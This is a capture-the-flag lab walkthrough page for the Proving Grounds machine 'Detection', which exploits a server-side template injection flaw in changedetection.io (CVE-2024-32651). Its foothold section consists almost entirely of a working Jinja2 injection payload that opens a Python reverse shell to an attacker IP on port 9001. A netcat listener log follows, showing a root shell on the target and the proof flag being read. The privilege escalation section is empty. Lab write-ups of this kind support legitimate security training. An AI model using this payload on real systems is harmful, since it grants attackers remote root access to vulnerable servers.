💻
Cyanide Security - Walkthroughs
Cheat Sheets
  • Welcome
    • Welcome
  • Proving Grounds
    • Snookums
    • Image
    • Extplorer
    • Blackgate
    • Cockpit
    • MZEEAV
    • Quackerjack
    • Pelican
    • Ochima
    • Squid
    • pyLoader
    • Detection
    • Pipe
    • Pebbles
    • Muddy
    • Exfiltrated
    • Wombo
    • RubyDome
    • Bratarina
    • Exghost
    • Hub
  • Hack The Box
    • HTB - Coming Soon
  • TryHackMe
    • THM - Coming Soon
  • CTF
    • CTF - Coming Soon
  • Self Hosted
    • Dev
    • Butler
    • Active Directory
      • Lab Creation
      • Lab Notes
Powered by GitBook
On this page
  • Intro
  • Initial Foothold
  • Privilege Escalation
  1. Proving Grounds

Detection

PreviouspyLoaderNextPipe

Last updated 8 months ago

Intro

Initial Foothold

{{ self.__init__.__globals__.__builtins__.__import__('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"192.168.45.196\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}

┌──(venv)─(root㉿kali)-[/home/joe/hax/pg/detection]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.199.97] 52556
root@detection:/# cat /root/proof.txt
cat /root/proof.txt
4b23104610703656c41480e23a67c656

Privilege Escalation

CVE-2024-32651 – Server Side Template Injection (Changedetection.io)Hacktive Security Blog
Logo